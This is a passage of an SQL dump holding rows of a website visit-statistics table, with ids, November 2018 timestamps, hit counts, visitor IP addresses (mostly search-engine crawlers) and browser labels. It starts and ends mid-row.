.148.239','other'),(328913,1541810119,1,1,0,0,'207.46.13.190','other'),(328914,1541810155,1,1,0,0,'54.36.149.66','other'),(328915,1541810173,1,1,0,0,'54.36.148.90','other'),(328916,1541810182,1,1,0,0,'46.229.168.144','other'),(328917,1541810344,6,6,0,0,'216.244.66.241','other'),(328918,1541810724,1,1,0,0,'54.36.149.62','other'),(328919,1541810806,1,1,0,0,'54.36.148.91','other'),(328920,1541810818,1,1,0,0,'54.36.148.235','other'),(328921,1541810863,1,1,0,0,'54.36.148.159','other'),(328922,1541811063,1,1,0,0,'66.249.64.57','chrome'),(328924,1541811119,1,1,0,0,'157.55.39.243','other'),(328925,1541811398,1,1,0,0,'54.36.149.0','other'),(328926,1541811408,1,1,0,0,'8.29.198.26','other'),(328927,1541811414,1,1,0,0,'54.36.148.82','other'),(328928,1541811450,1,1,0,0,'54.36.148.168','other'),(328929,1541811877,1,1,0,0,'54.36.149.50','other'),(328930,1541811926,1,1,0,0,'66.249.64.218','chrome'),(328931,1541811936,1,1,0,0,'66.249.64.220','chrome'),(328932,1541812584,1,1,0,0,'54.36.148.220','other'),(328933,1541812629,1,1,0,0,'66.249.64.44','chrome'),(328934,1541812927,3,3,0,0,'216.244.66.241','other'),(328935,1541812987,1,1,0,0,'8.29.198.27','other'),(328936,1541813036,1,1,0,0,'54.36.148.176','other'),(328937,1541813303,1,1,0,0,'54.36.148.116','other'),(328938,1541813490,1,1,0,0,'8.29.198.26','other'),(328939,1541813603,3,3,0,0,'157.55.39.243','other'),(328940,1541813669,1,1,0,0,'207.46.13.117','other'),(328941,1541813810,1,1,0,0,'54.36.148.234','other'),(328942,1541813841,1,1,0,0,'66.249.64.201','chrome'),(328943,1541813897,1,1,0,0,'54.36.148.167','other'),(328944,1541814006,1,1,0,0,'54.36.148.176','other'),(328945,1541814114,1,1,0,0,'66.249.64.195','chrome'),(328946,1541814115,1,1,0,0,'66.249.64.222','chrome'),(328947,1541814199,1,1,0,0,'54.36.149.81','other'),(328948,1541814732,1,1,0,0,'216.244.66.241','other'),(328949,1541814897,1,1,0,0,'54.36.149.106','other'),(328950,1541815497,4,4,0,0,'178.154.244.11','other'),(328951,1541815523,1,1,0,0,'54.36.148.167','other'),(328952,1541815530,1,1,0,0,'54.36.148.225','other'),(328953,1541815543,1,1,0,0,'5.45.207.79','other'),(328954,1541815568,5,5,0,0,'178.154.244.29','other'),(328955,1541815683,1,1,0,0,'54.36.149.69','other'),(328956,1541815888,1,1,0,0,'54.36.149.86','other'),(328957,1541816085,1,1,0,0,'54.36.148.124','other'),(328958,1541816407,1,1,0,0,'178.154.244.11','other'),(328959,1541816626,1,1,0,0,'66.249.64.201','chrome'),(328960,1541816627,1,1,0,0,'66.249.64.220','chrome'),(328961,1541816680,4,4,0,0,'69.58.178.56','other'),(328962,1541816685,2,2,0,0,'178.154.244.29','other'),(328963,1541816774,2,2,0,0,'207.46.13.190','other'),(328964,1541816829,6,6,0,0,'51.75.168.145','firefox'),(328965,1541816840,2,2,0,0,'51.75.168.145','other'),(328966,1541817335,1,1,0,0,'54.36.149.56','other'),(328967,1541817351,1,1,0,0,'66.249.64.218','chrome'),(328968,1541817383,1,1,0,0,'54.36.149.90','other'),(328969,1541817389,1,1,0,0,'66.249.64.222','chrome'),(328970,1541817500,2,2,0,0,'54.188.223.197','chrome'),(328971,1541817580,1,1,0,0,'54.36.149.11','other'),(328972,1541817712,3,3,0,0,'216.244.66.241','other'),(328973,1541818179,1,1,0,0,'207.46.13.190','other'),(328974,1541818183,1,1,0,0,'157.55.39.152','other'),(328975,1541818188,3,3,0,0,'157.55.39.243','other'),(328976,1541818193,5,5,0,0,'207.46.13.117','other'),(328977,1541818583,1,1,0,0,'178.154.244.11','other'),(328978,1541818736,4,4,0,0,'66.249.64.44','chrome'),(328979,1541818779,5,5,0,0,'66.249.64.42','chrome'),(328980,1541818870,1,1,0,0,'54.36.148.212','other'),(328981,1541818902,16,16,0,0,'66.249.64.40','chrome'),(328982,1541819535,5,5,0,0,'216.244.66.241','other'),(328983,1541819545,1,1,0,0,'54.36.148.40','other'),(328984,1541819572,2,2,0,0,'52.53.201.78','chrome'),(328985,1541820077,1,1,0,0,'54.36.148.85','other'),(328986,1541820112,1,1,0,0,'176.108.188.1','chrome'),(328987,1541820182,3,3,0,0,'66.249.64.220','chrome'),(328988,1541820189,1,1,0,0,'207.46.13.117','other'),(328989,1541820278,1,1,0,0,'66.249.64.195','chrome'),(328990,1541820321,2,2,0,0,'66.249.64.218','chrome'),(328991,1541820544,1,1,0,0,'54.36.148.167','other'),(328992,1541820991,5,5,0,0,'66.249.64.44','chrome'),(328993,1541821042,1,1,0,0,'54.36.148.203','other'),(328994,1541821181,4,4,0,0,'66.249.64.220','chrome'),(328995,1541821357,10,10,0,0,'66.249.64.218','chrome'),(328996,1541821579,10,10,0,0,'66.249.64.40','chrome'),(328997,1541821586,4,4,0,0,'66.249.64.42','chrome'),(328998,1541821607,1,1,0,0,'54.36.148.53','other'),(328999,1541822050,1,1,0,0,'66.249.64.222','chrome'),(329000,1541822166,1,1,0,0,'54.36.149.83','other'),(329001,1541822194,1,1,0,0,'157.55.39.243','other'),(329002,1541822212,2,2,0,0,'66.249.64.44','chrome'),(329003,1541822252,1,1,0,0,'8.29.198.25','other'),(329004,1541822321,1,1,0,0,'54.36.148.22','other'),(329005,1541822462,1,1,0,0,'178.154.244.11','other'),(329006,1541822580,1,1,0,0,'66.249.64.218','chrome'),(329007,1541822636,1,1,0,0,'54.36.148.89','other'),(329008,1541822882,1,1,0,0,'80.90.55.168','other'),(329009,1541823153,5,5,0,0,'216.244.66.241','other'),(329010,1541823319,1,1,0,0,'66.249.64.44','chrome'),(329011,1541823734,1,1,0,0,'66.249.64.222','chrome'),(329012,1541823833,1,1,0,0,'8.29.198.27','other'),(329013,1541823915,1,1,0,0,'54.36.149.55','other'),(329014,1541823931,1,1,0,0,'66.249.64.201','chrome'),(329015,1541823932,2,2,0,0,'66.249.64.220','chrome'),(329016,1541823987,2,2,0,0,'66.249.64.218','chrome'),(329017,1541824199,1,1,0,0,'54.36.148.127','other'),(329018,1541824349,1,1,0,0,'8.29.198.26','other'),(329019,1541824495,1,1,0,0,'66.249.64.44','chrome'),(329020,1541824496,2,2,0,0,'216.244.66.241','other'),(329021,1541824507,1,1,0,0,'54.36.148.248','other'),(329022,1541824550,1,1,0,0,'54.36.149.12','other'),(329023,1541824591,1,1,0,0,'54.36.149.99','other'),(329024,1541824622,1,1,0,0,'54.36.148.76','other'),(329025,1541824733,1,1,0,0,'54.36.149.37','other'),(329026,1541825368,1,1,0,0,'54.36.148.228','other'),(329027,1541825735,1,1,0,0,'54.36.148.158','other'),(329028,1541825783,2,2,0,0,'95.213.141.126','opera'),(329029,1541825859,1,1,0,0,'66.249.64.220','chrome'),(329030,1541825901,1,1,0,0,'66.249.64.195','chrome'),(329031,1541825902,1,1,0,0,'66.249.64.218','chrome'),(329032,1541826105,2,2,0,0,'216.244.66.241','other'),(329033,1541826231,1,1,0,0,'54.36.149.20','other'),(329034,1541826734,1,1,0,0,'54.36.149.30','other'),(329035,1541827047,1,1,0,0,'54.36.148.179','other'),(329036,1541827113,1,1,0,0,'54.36.148.11','other'),(329037,1541827128,1,1,0,0,'66.249.64.222','chrome'),(329038,1541827151,1,1,0,0,'54.36.149.92','other'),(329039,1541827322,1,1,0,0,'54.36.148.133','other'),(329040,1541827417,1,1,0,0,'54.36.148.140','other'),(329041,1541827456,1,1,0,0,'157.55.39.152','other'),(329042,1541827492,1,1,0,0,'66.249.64.220','chrome'),(329043,1541827587,1,1,0,0,'54.36.149.18','other'),(329044,1541827727,1,1,0,0,'54.36.149.21','other'),(329045,1541827742,1,1,0,0,'54.36.148.175','other'),(329046,1541827822,1,1,0,0,'54.36.148.198','other'),(329047,1541828217,1,1,0,0,'66.249.64.222','chrome'),(329048,1541828252,1,1,0,0,'54.36.148.166','other'),(329049,1541828300,5,5,0,0,'216.244.66.241','other'),(329050,1541828404,1,1,0,0,'95.163.255.97','other'),(329051,1541828408,1,1,0,0,'95.163.255.95','other'),(329052,1541828554,1,1,0,0,'66.249.64.44','chrome'),(329053,1541828833,1,1,0,0,'54.36.148.24','other'),(329054,1541828951,1,1,0,0,'54.36.149.102','other'),(329055,1541829229,1,1,0,0,'54.36.149.5','other'),(329056,1541829301,1,1,0,0,'66.249.64.59','chrome'),(329057,1541829302,1,1,0,0,'66.249.64.42','chrome'),(329058,1541829465,1,1,0,0,'54.36.148.61','other'),(329059,1541829596,1,1,0,0,'54.36.148.47','other'),(329060,1541829634,2,2,0,0,'46.211.108.11','chrome'),(329061,1541830139,1,1,0,0,'54.36.148.194','other'),(329062,1541830158,2,2,0,0,'91.209.11.236','other'),(329063,1541830441,1,1,0,0,'66.249.64.57','chrome'),(329064,1541830442,2,2,0,0,'66.249.64.44','chrome'),(329065,1541830685,1,1,0,0,'54.36.148.251','other'),(329066,1541831019,1,1,0,0,'216.244.66.241','other'),(329067,1541831048,1,1,0,0,'66.249.64.61','chrome'),(329068,1541831282,2,2,0,0,'207.46.13.117','other'),(329069,1541831524,1,1,0,0,'157.55.39.243','other'),(329070,1541831649,1,1,0,0,'54.36.148.62','other'),(329071,1541831889,1,1,0,0,'54.36.149.60','other'),(329072,1541831985,1,1,0,0,'95.163.255.92','other'),(329073,1541832036,1,1,0,0,'95.163.255.98','other'),(329074,1541832709,1,1,0,0,'54.36.148.139','other'),(329075,1541832811,1,1,0,0,'54.36.149.95','other'),(329076,1541832960,5,5,0,0,'178.154.244.29','other'),(329077,1541832975,8,8,0,0,'178.154.244.11','other'),(329078,1541832986,1,1,0,0,'54.36.148.94','other'),(329079,1541833010,1,1,0,0,'54.36.149.67','other'),(329080,1541833038,1,1,0,0,'37.9.113.20','other'),(329081,1541833097,1,1,0,0,'8.29.198.25','other'),(329082,1541833138,2,2,0,0,'216.244.66.241','other'),(329083,1541833396,1,1,0,0,'54.36.148.130','other'),(329084,1541833503,4,3,1,0,'66.249.64.222',''),(329085,1541833505,2,2,0,0,'207.46.13.117','other'),(329086,1541833777,2,2,0,0,'66.249.64.201','chrome'),(329087,1541833826,1,0,1,0,'66.249.64.44',''),(329088,1541834033,2,2,0,0,'91.196.178.129','firefox'),(329089,1541834056,1,1,0,0,'157.55.39.152','other'),(329090,1541834132,3,3,0,0,'216.244.66.241','other'),(329091,1541834525,1,1,0,0,'54.36.148.241','other'),(329092,1541834622,1,1,0,0,'66.249.64.57','chrome'),(329094,1541834688,1,1,0,0,'8.29.198.25','other'),(329095,1541835159,1,1,0,0,'54.36.148.154','other'),(329096,1541835185,1,1,0,0,'66.249.64.218','chrome'),(329097,1541835201,1,1,0,0,'8.29.198.27','other'),(329098,1541835210,1,1,0,0,'54.36.148.80','other'),(329099,1541835212,1,1,0,0,'54.36.148.14','other'),(329100,1541835213,1,1,0,0,'66.249.64.220','chrome'),(329101,1541835218,1,1,0,0,'54.36.149.62','other'),(329102,1541835388,1,1,0,0,'178.154.244.29','other'),(329103,1541835447,1,1,0,0,'54.36.148.78','other'),(329104,1541835640,1,1,0,0,'54.36.148.113','other'),(329105,1541835732,1,1,0,0,'54.36.148.109','other'),(329106,1541835734,1,1,0,0,'207.46.13.190','other'),(329107,1541835785,2,2,0,0,'216.244.66.241','other'),(329108,1541835875,1,1,0,0,'54.36.148.64','other'),(329109,1541836313,1,1,0,0,'178.154.244.29','other'),(329110,1541836580,1,1,0,0,'54.36.148.203','other'),(329111,1541836592,1,1,0,0,'54.36.148.83','other'),(329112,1541836959,1,1,0,0,'54.36.149.37','other'),(329113,1541836997,1,1,0,0,'54.36.149.4','other'),(329114,1541837240,1,1,0,0,'66.249.64.218','chrome'),(329115,1541837249,1,1,0,0,'54.36.149.46','other'),(329116,1541837364,1,1,0,0,'54.36.148.234','other'),(329117,1541837933,1,1,0,0,'54.36.149.63','other'),(329118,1541838077,1,1,0,0,'66.249.64.57','chrome'),(329119,1541838078,1,1,0,0,'66.249.64.44','chrome'),(329120,1541838145,2,2,0,0,'207.46.13.190','other'),(329121,1541838162,1,1,0,0,'54.36.148.210','other'),(329122,1541838463,2,2,0,0,'216.244.66.241','other'),(329123,1541838525,1,1,0,0,'54.36.149.62','other'),(329124,1541838528,1,1,0,0,'66.249.64.222','chrome'),(329125,1541838986,1,1,0,0,'66.249.64.218','chrome'),(329126,1541839200,1,1,0,0,'54.36.148.160','other'),(329127,1541839225,2,2,0,0,'66.249.64.220','chrome'),(329128,1541839591,2,2,0,0,'157.55.39.243','other'),(329129,1541839597,1,1,0,0,'66.249.64.222','chrome'),(329130,1541840047,1,1,0,0,'54.36.149.22','other'),(329131,1541840172,1,1,0,0,'54.36.149.34','other'),(329132,1541840468,1,1,0,0,'54.36.148.32','other'),(329133,1541840546,1,1,0,0,'54.36.149.51','other'),(329134,1541840869,1,1,0,0,'54.36.148.254','other'),(329135,1541840981,1,1,0,0,'54.36.149.89','other'),(329136,1541841464,1,1,0,0,'216.244.66.241','other'),(329137,1541841664,1,1,0,0,'54.36.148.226','other'),(329138,1541841691,1,1,0,0,'207.46.13.117','other'),(329139,1541841973,1,1,0,0,'54.36.149.74','other'),(329140,1541842335,1,1,0,0,'54.36.148.45','other'),(329141,1541842526,1,1,0,0,'66.249.64.42','chrome'),(329142,1541842649,1,1,0,0,'54.36.149.28','other'),(329143,1541842878,1,1,0,0,'66.249.64.218','chrome'),(329144,1541842905,1,1,0,0,'207.46.13.117','other'),(329145,1541843000,2,2,0,0,'54.36.148.230','other'),(329146,1541843257,1,1,0,0,'54.36.148.200','other'),(329147,1541843284,1,1,0,0,'54.36.148.225','other'),(329148,1541843433,1,1,0,0,'66.249.64.201','chrome'),(329149,1541843547,1,1,0,0,'54.36.148.24','other'),(329150,1541843754,2,2,0,0,'216.244.66.241','other'),(329151,1541843831,1,1,0,0,'54.36.148.165','other'),(329152,1541843933,1,1,0,0,'8.29.198.26','other'),(329153,1541844053,1,1,0,0,'54.36.148.173','other'),(329154,1541844303,1,1,0,0,'54.36.148.58','other'),(329155,1541844719,1,1,0,0,'46.229.168.138','other'),(329156,1541844767,1,1,0,0,'54.36.149.94','other'),(329157,1541844872,1,1,0,0,'54.36.149.17','other'),(329158,1541844894,1,1,0,0,'54.36.149.105','other'),(329159,1541845022,1,1,0,0,'54.36.149.83','other'),(329160,1541845172,2,2,0,0,'66.249.64.220','chrome'),(329161,1541845235,1,1,0,0,'54.36.149.67','other'),(329162,1541845536,1,1,0,0,'8.29.198.26','other'),(329163,1541845775,1,1,0,0,'54.36.148.146','other'),(329164,1541845914,1,1,0,0,'54.36.148.214','other'),(329165,1541845932,1,1,0,0,'66.249.64.199','chrome'),(329166,1541846044,1,1,0,0,'8.29.198.27','other'),(329167,1541846416,2,2,0,0,'54.36.148.84','other'),(329168,1541846438,1,1,0,0,'95.163.255.92','other'),(329169,1541846441,1,1,0,0,'95.163.255.99','other'),(329170,1541846699,2,2,0,0,'216.244.66.241','other'),(329171,1541846727,1,1,0,0,'54.36.148.31','other'),(329172,1541847546,1,1,0,0,'54.36.148.105','other'),(329173,1541847807,1,1,0,0,'178.255.215.94','other'),(329174,1541847861,1,1,0,0,'66.249.64.40','chrome'),(329175,1541848192,1,1,0,0,'66.249.64.220','chrome'),(329176,1541848261,1,1,0,0,'54.36.148.154','other'),(329177,1541848301,1,1,0,0,'54.36.149.103','other'),(329178,1541848377,1,1,0,0,'54.36.148.11','other'),(329179,1541848828,2,2,0,0,'178.154.244.62','other'),(329180,1541848854,1,1,0,0,'54.36.148.64','other'),(329181,1541848886,1,1,0,0,'95.108.213.4','other'),(329182,1541848895,4,4,0,0,'178.154.171.88','other'),(329183,1541848930,5,5,0,0,'141.8.142.74','other'),(329184,1541848984,13,13,0,0,'178.154.244.29','other'),(329185,1541849019,1,1,0,0,'5.45.207.19','other'),(329186,1541849037,4,4,0,0,'178.154.244.11','other'),(329187,1541849204,1,1,0,0,'87.250.224.46','other'),(329188,1541849268,1,1,0,0,'87.250.224.65','other'),(329189,1541849275,1,1,0,0,'54.36.148.19','other'),(329190,1541849351,1,1,0,0,'37.9.113.20','other'),(329191,1541849357,2,2,0,0,'5.45.207.79','other'),(329192,1541849395,1,1,0,0,'54.36.148.34','other'),(329193,1541849414,1,1,0,0,'37.9.113.148','other'),(329194,1541849425,6,6,0,0,'216.244.66.241','other'),(329195,1541849648,1,1,0,0,'66.249.64.42','chrome'),(329196,1541849894,3,3,0,0,'178.154.244.29','other'),(329197,1541849937,1,1,0,0,'54.36.148.144','other'),(329198,1541849940,1,1,0,0,'54.36.148.156','other'),(329199,1541850132,1,1,0,0,'54.36.148.127','other'),(329200,1541850141,1,1,0,0,'66.249.64.201','chrome'),(329201,1541850142,1,1,0,0,'66.249.64.222','chrome'),(329202,1541850599,1,1,0,0,'54.36.148.74','other'),(329203,1541850753,1,1,0,0,'66.249.64.218','chrome'),(329204,1541850803,1,1,0,0,'54.36.149.21','other'),(329205,1541851071,1,1,0,0,'54.36.148.82','other'),(329206,1541851091,1,1,0,0,'54.36.148.170','other'),(329207,1541851299,1,1,0,0,'54.36.148.27','other'),(329208,1541851514,1,1,0,0,'46.229.168.135','other'),(329209,1541851572,1,1,0,0,'54.36.148.240','other'),(329210,1541851762,2,2,0,0,'216.244.66.241','other'),(329211,1541851948,1,1,0,0,'54.36.149.19','other'),(329212,1541851953,1,1,0,0,'54.36.149.25','other'),(329213,1541852005,1,1,0,0,'5.45.207.19','other'),(329214,1541852009,1,1,0,0,'178.154.244.11','other'),(329215,1541852141,2,2,0,0,'46.211.119.8','chrome'),(329216,1541852199,1,1,0,0,'54.36.148.175','other'),(329217,1541852290,1,1,0,0,'54.36.148.75','other'),(329218,1541852324,1,1,0,0,'54.36.148.206','other'),(329219,1541852506,1,1,0,0,'66.249.64.222','chrome'),(329220,1541852576,1,1,0,0,'54.36.149.96','other'),(329221,1541852601,1,1,0,0,'54.36.149.76','other'),(329222,1541852776,4,4,0,0,'178.154.244.29','other'),(329223,1541853059,1,1,0,0,'54.36.148.132','other'),(329224,1541853406,2,2,0,0,'91.209.11.236','other'),(329225,1541853423,1,1,0,0,'54.36.148.106','other'),(329226,1541853681,1,1,0,0,'51.255.65.46','other'),(329227,1541853818,1,1,0,0,'54.36.148.94','other'),(329228,1541854014,1,1,0,0,'54.36.148.235','other'),(329229,1541854136,3,3,0,0,'216.244.66.241','other'),(329230,1541854590,1,1,0,0,'66.249.64.220','chrome'),(329231,1541854633,1,1,0,0,'66.249.64.44','chrome'),(329232,1541854638,1,1,0,0,'66.249.64.42','chrome'),(329233,1541854665,3,3,0,0,'66.249.64.40','chrome'),(329234,1541854737,1,1,0,0,'95.163.255.98','other'),(329235,1541854739,1,1,0,0,'95.163.255.93','other'),(329236,1541854768,1,1,0,0,'8.29.198.25','other'),(329237,1541854886,1,1,0,0,'66.249.64.218','chrome'),(329238,1541854887,2,2,0,0,'188.32.106.38','firefox'),(329239,1541854956,1,1,0,0,'54.36.149.57','other'),(329240,1541855181,1,1,0,0,'54.36.148.136','other'),(329241,1541855237,2,2,0,0,'178.154.244.29','other'),(329242,1541855884,1,1,0,0,'66.249.64.201','chrome'),(329244,1541855891,1,1,0,0,'54.36.149.84','other'),(329245,1541856155,1,1,0,0,'54.36.148.136','other'),(329246,1541856210,1,1,0,0,'54.36.149.79','other'),(329247,1541856256,1,1,0,0,'54.36.149.22','other'),(329248,1541856375,2,2,0,0,'78.111.187.88','chrome'),(329249,1541856384,2,2,0,0,'207.46.13.190','other'),(329251,1541856387,2,2,0,0,'8.29.198.26','other'),(329252,1541856742,1,1,0,0,'54.36.148.73','other'),(329253,1541856744,1,1,0,0,'54.36.148.124','other'),(329254,1541856791,1,1,0,0,'216.244.66.241','other'),(329255,1541857010,1,1,0,0,'46.229.168.141','other'),(329256,1541857377,1,1,0,0,'46.229.168.140','other'),(329257,1541857404,1,1,0,0,'54.36.148.15','other'),(329258,1541857666,1,1,0,0,'54.36.149.57','other'),(329259,1541857669,1,1,0,0,'46.229.168.139','other'),(329260,1541857777,1,1,0,0,'66.249.64.199','chrome'),(329261,1541857778,1,1,0,0,'66.249.64.220','chrome'),(329262,1541858278,1,1,0,0,'54.36.148.101','other'),(329263,1541858734,1,1,0,0,'207.46.13.117','other'),(329264,1541858838,1,1,0,0,'54.36.148.123','other'),(329265,1541859119,1,1,0,0,'54.36.148.60','other'),(329266,1541859206,1,1,0,0,'66.249.64.201','chrome'),(329267,1541859444,1,1,0,0,'66.249.64.218','chrome'),(329268,1541859998,2,2,0,0,'216.244.66.241','other'),(329269,1541860771,1,1,0,0,'54.36.148.146','other'),(329270,1541860925,1,1,0,0,'54.36.148.34','other'),(329271,1541861127,1,1,0,0,'54.36.148.57','other'),(329272,1541861350,1,1,0,0,'54.36.149.64','other'),(329273,1541861395,1,1,0,0,'66.249.64.220','chrome'),(329274,1541861406,1,1,0,0,'95.163.255.115','other'),(329275,1541861789,1,1,0,0,'54.36.148.127','other'),(329276,1541862016,1,1,0,0,'54.36.148.230','other'),(329277,1541862030,1,1,0,0,'95.163.255.118','other'),(329278,1541862032,1,1,0,0,'54.36.148.13','other'),(329279,1541862309,2,2,0,0,'46.229.168.146','other'),(329280,1541862311,1,1,0,0,'46.229.168.132','other'),(329281,1541862644,2,2,0,0,'216.244.66.241','other'),(329282,1541862802,1,1,0,0,'54.36.148.40','other'),(329283,1541863000,1,1,0,0,'54.36.149.17','other'),(329284,1541863200,1,1,0,0,'54.36.148.15','other'),(329285,1541863285,1,1,0,0,'46.229.168.146','other'),(329286,1541863288,1,1,0,0,'46.229.168.136','other'),(329287,1541863506,1,1,0,0,'66.249.64.220','chrome'),(329288,1541863613,1,1,0,0,'54.36.148.185','other'),(329289,1541863674,1,1,0,0,'193.0.207.2','other'),(329290,1541863731,1,1,0,0,'54.36.148.133','other'),(329291,1541863827,1,1,0,0,'54.36.149.35','other'),(329292,1541863884,9,9,0,0,'178.154.244.29','other'),(329293,1541864048,1,1,0,0,'46.229.168.148','other'),(329294,1541864052,1,1,0,0,'46.229.168.141','other'),(329295,1541864055,1,1,0,0,'66.249.64.42','chrome'),(329296,1541864082,9,9,0,0,'178.154.244.11','other'),(329297,1541864101,1,1,0,0,'54.36.149.16','other'),(329298,1541864273,1,1,0,0,'54.36.148.245','other'),(329299,1541864300,1,1,0,0,'87.250.224.47','other'),(329300,1541864535,1,1,0,0,'5.45.207.19','other'),(329301,1541864597,1,1,0,0,'54.36.149.102','other'),(329302,1541864642,5,5,0,0,'5.45.207.79','other'),(329303,1541864646,1,1,0,0,'66.249.64.44','chrome'),(329304,1541864745,1,1,0,0,'54.36.148.43','other'),(329305,1541864794,7,7,0,0,'178.154.244.29','other'),(329306,1541864898,1,1,0,0,'54.36.148.213','other'),(329307,1541864982,3,3,0,0,'216.244.66.241','other'),(329308,1541864983,2,2,0,0,'178.154.244.11','other'),(329309,1541864999,1,1,0,0,'46.229.168.136','other'),(329310,1541865603,1,1,0,0,'8.29.198.26','other'),(329311,1541865698,2,2,0,0,'178.154.244.29','other'),(329312,1541865842,1,1,0,0,'46.229.168.129','other'),(329313,1541865957,1,1,0,0,'54.36.149.99','other'),(329314,1541866169,1,1,0,0,'54.36.148.57','other'),(329315,1541866351,1,1,0,0,'54.36.148.145','other'),(329316,1541866757,1,1,0,0,'54.36.148.231','other'),(329317,1541866887,1,1,0,0,'46.229.168.137','other'),(329318,1541867240,1,1,0,0,'8.29.198.26','other'),(329319,1541867250,1,1,0,0,'54.36.148.175','other'),(329320,1541867354,1,1,0,0,'54.36.148.224','other'),(329321,1541867585,1,1,0,0,'54.36.148.208','other'),(329322,1541867689,4,4,0,0,'216.244.66.241','other'),(329323,1541867715,1,1,0,0,'8.29.198.25','other'),(329324,1541868135,1,1,0,0,'54.36.148.110','other'),(329325,1541868773,1,1,0,0,'66.249.64.59','chrome'),(329327,1541868779,1,1,0,0,'54.36.149.23','other'),(329328,1541869112,1,1,0,0,'46.229.168.138','other'),(329329,1541869344,1,1,0,0,'46.229.168.141','other'),(329330,1541869585,1,1,0,0,'94.231.178.166','msie'),(329331,1541869849,1,1,0,0,'54.36.148.188','other'),(329332,1541869908,1,1,0,0,'66.249.64.195','chrome'),(329333,1541870009,2,2,0,0,'66.249.64.220','chrome'),(329334,1541870056,1,1,0,0,'66.249.64.40','chrome'),(329335,1541870060,1,1,0,0,'54.36.149.98','other'),(329336,1541870122,1,1,0,0,'66.249.64.201','chrome'),(329337,1541870197,1,1,0,0,'54.36.148.61','other'),(329338,1541870566,1,1,0,0,'54.36.148.77','other'),(329339,1541870663,7,7,0,0,'216.244.66.241','other'),(329340,1541871054,1,1,0,0,'46.229.168.139','other'),(329341,1541871238,1,1,0,0,'66.249.64.220','chrome'),(329342,1541871246,1,1,0,0,'54.36.148.209','other'),(329343,1541871397,1,1,0,0,'207.46.13.190','other'),(329344,1541871412,1,1,0,0,'66.249.64.199','chrome'),(329345,1541871417,2,2,0,0,'66.249.64.218','chrome'),(329346,1541871420,1,1,0,0,'66.249.64.42','chrome'),(329347,1541871676,1,1,0,0,'54.36.148.54','other'),(329348,1541871739,1,1,0,0,'54.36.148.201','other'),(329349,1541871769,1,1,0,0,'54.36.149.64','other'),(329350,1541871772,1,1,0,0,'46.229.168.136','other'),(329351,1541871859,1,1,0,0,'54.36.148.252','other'),(329352,1541872068,1,1,0,0,'54.36.149.11','other'),(329353,1541872181,1,1,0,0,'54.36.148.85','other'),(329354,1541872519,1,1,0,0,'54.36.149.38','other'),(329355,1541872629,1,1,0,0,'54.36.148.101','other'),(329356,1541872714,1,1,0,0,'54.36.149.31','other'),(329357,1541872729,1,1,0,0,'54.36.149.68','other'),(329358,1541872767,1,1,0,0,'54.36.149.85','other'),(329359,1541872953,1,1,0,0,'54.36.148.35','other'),(329360,1541872993,1,1,0,0,'46.229.168.133','other'),(329361,1541872996,1,1,0,0,'46.229.168.136','other'),(329362,1541873201,1,1,0,0,'54.36.148.51','other'),(329363,1541873237,1,1,0,0,'54.36.148.142','other'),(329364,1541873489,2,2,0,0,'216.244.66.241','other'),(329365,1541873544,1,1,0,0,'178.154.244.29','other'),(329366,1541873575,1,1,0,0,'54.36.149.67','other'),(329367,1541873612,1,1,0,0,'46.229.168.134','other'),(329368,1541873740,1,1,0,0,'46.229.168.152','other'),(329369,1541873799,1,1,0,0,'54.36.148.221','other'),(329370,1541873847,1,1,0,0,'54.36.148.171','other'),(329371,1541873920,1,1,0,0,'54.36.148.179','other'),(329372,1541874055,1,1,0,0,'54.36.149.52','other'),(329373,1541874249,1,1,0,0,'95.163.255.97','other'),(329374,1541874252,1,1,0,0,'95.163.255.92','other'),(329375,1541874962,1,1,0,0,'54.36.148.12','other'),(329376,1541875063,1,1,0,0,'54.36.149.11','other'),(329377,1541875648,1,1,0,0,'54.36.149.3','other'),(329378,1541875796,1,1,0,0,'54.36.149.73','other'),(329379,1541875929,2,2,0,0,'95.163.255.92','other'),(329380,1541876188,1,1,0,0,'54.36.148.104','other'),(329381,1541876442,1,1,0,0,'8.29.198.25','other'),(329382,1541876569,1,1,0,0,'66.249.66.40','chrome'),(329383,1541876747,1,1,0,0,'54.36.148.247','other'),(329384,1541876801,1,1,0,0,'46.229.168.144','other'),(329385,1541876803,1,1,0,0,'46.229.168.148','other'),(329386,1541877101,1,1,0,0,'54.36.149.28','other'),(329387,1541877243,1,1,0,0,'54.36.148.204','other'),(329388,1541877269,1,1,0,0,'54.36.148.104','other'),(329389,1541877344,1,1,0,0,'54.36.148.199','other'),(329390,1541877376,1,1,0,0,'95.163.255.92','other'),(329391,1541877378,1,1,0,0,'95.163.255.96','other'),(329392,1541877568,1,1,0,0,'66.249.66.154','chrome'),(329393,1541877940,1,1,0,0,'54.36.148.136','other'),(329394,1541878100,2,2,0,0,'8.29.198.27','other'),(329395,1541878195,1,1,0,0,'216.244.66.241','other'),(329396,1541879627,1,1,0,0,'95.163.255.97','other'),(329397,1541879634,1,1,0,0,'95.163.255.92','other'),(329398,1541879719,1,1,0,0,'216.244.66.241','other'),(329399,1541879770,1,1,0,0,'46.229.168.138','other'),(329400,1541879821,1,1,0,0,'66.249.66.152','chrome'),(329401,1541879822,1,1,0,0,'54.36.148.74','other'),(329402,1541880041,1,1,0,0,'37.9.113.148','other'),(329403,1541880132,1,1,0,0,'54.36.149.78','other'),(329404,1541880142,7,7,0,0,'178.154.244.11','other'),(329405,1541880210,17,17,0,0,'178.154.244.29','other'),(329406,1541880272,1,1,0,0,'54.36.148.14','other'),(329407,1541880291,1,1,0,0,'54.36.149.48','other'),(329408,1541880325,4,4,0,0,'5.45.207.79','other'),(329409,1541880329,2,2,0,0,'5.45.207.19','other'),(329410,1541880664,1,1,0,0,'46.229.168.130','other'),(329411,1541880666,1,1,0,0,'46.229.168.137','other'),(329412,1541880784,1,1,0,0,'54.36.149.81','other'),(329413,1541881215,1,1,0,0,'178.154.244.11','other'),(329414,1541881232,6,6,0,0,'178.154.244.29','other'),(329415,1541881274,1,1,0,0,'54.36.148.84','other'),(329416,1541881316,1,1,0,0,'207.46.13.190','other'),(329417,1541881606,1,1,0,0,'54.36.149.49','other'),(329418,1541881635,1,1,0,0,'37.9.113.20','other'),(329419,1541881640,1,0,1,0,'66.249.66.154',''),(329420,1541881677,1,1,0,0,'207.46.13.117','other'),(329421,1541881857,1,1,0,0,'54.36.149.63','other'),(329422,1541882188,1,1,0,0,'54.36.148.110','other'),(329423,1541882192,1,1,0,0,'66.249.66.154','chrome'),(329424,1541882271,1,1,0,0,'178.154.244.29','other'),(329425,1541882287,1,1,0,0,'54.36.148.223','other'),(329426,1541882339,3,3,0,0,'216.244.66.241','other'),(329427,1541882347,1,1,0,0,'178.154.244.11','othe